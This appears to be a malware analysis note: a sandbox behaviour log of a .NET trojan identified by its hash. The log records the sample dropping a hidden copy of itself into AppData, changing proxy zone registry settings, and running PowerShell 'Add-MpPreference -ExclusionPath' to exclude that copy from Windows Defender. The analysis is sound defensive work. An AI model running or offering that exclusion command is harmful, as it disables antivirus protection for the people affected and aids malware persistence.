木马分析 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292

 

 

看下行为:

09:32:34:044,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_create,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' image_base:0x0000000000FD0000 image_size:0x0008A000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:093,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:107,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:107,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006A3B0000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:138,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:138,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:201,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:216,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000069950000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:248,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:248,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:373,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:373,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:404,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000069130000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:420,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000073EC0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:451,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x00000000689B0000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:576,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x0000000073D50000 size:0x0008E000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:669,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:669,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:716,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x000000006C7D0000 size:0x0016F000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:413,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:413,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:413,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:452,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	access:0x0017019F alloc_size:537088 attrib:0x00000020 share_access:0x00000000 disposition:0x00000002 options:0x00000044 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	eof:0x00083200 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_write,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	offset:0x00000000 datalen:0x00040000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_chmod,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_chmod,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	attrib:0x00002087 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	BA_extract_hidden,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	,	0x00000000 [操作成功完成。  ],	
09:33:16:482,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_setsec,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	,	0x00000000 [操作成功完成。  ],	
09:33:16:482,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:498,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:513,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll,	base:0x0000000068650000 size:0x00357000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:603,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	target_pid:5080 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:0,	2928,	EXEC_create,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\System32\wow64win.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\user32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\System32\wow64.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\wow64cpu.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\KernelBase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\locale.nls,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\System32\conhost.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msvcrt.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\oleaut32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msvcp_win.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\combase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\rpcrt4.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\sspicli.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\cryptbase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\bcryptprimitives.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\sechost.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\advapi32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\gdi32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\gdi32full.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\user32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\win32u.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ucrtbase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\atl.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\mscoree.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\imm32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\WindowsPowerShell\v1.0\zh-CN\powershell.exe.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	offset:0x00000000 datalen:0x00000646 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\shlwapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\kernel.appcore.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\version.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\Globalization\Sorting\SortDefault.nls,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ole32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\psapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_netfx4-mscoreei_dll_b03f5f7f11d50a3a_4.0.15744.551_none_73fe24de2a51a8fe\mscoreei.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\bcrypt.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5744,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_netfx4-vcruntime140_clr_dll_31bf3856ad364e35_4.0.15744.161_none_dfd2b7ab83adb539\vcruntime140_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\System32\C_1252.NLS,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\rsaenh.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\SysWOW64\clbcatq.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_netfx4-ucrtbase_clr_dll_b03f5f7f11d50a3a_4.0.15744.161_none_2a27da64743bf3cb\ucrtbase_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\winnlsres.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\winnlsres.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\shell32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\cfgmgr32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\SHCore.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\windows.storage.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\profapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\powrprof.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\wintrust.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msasn1.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\SysWOW64\crypt32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5744,	2928,	FILE_chmod,	C:\Windows\SysWOW64\cryptsp.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\amsi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\wldp.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\SysWOW64\userenv.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
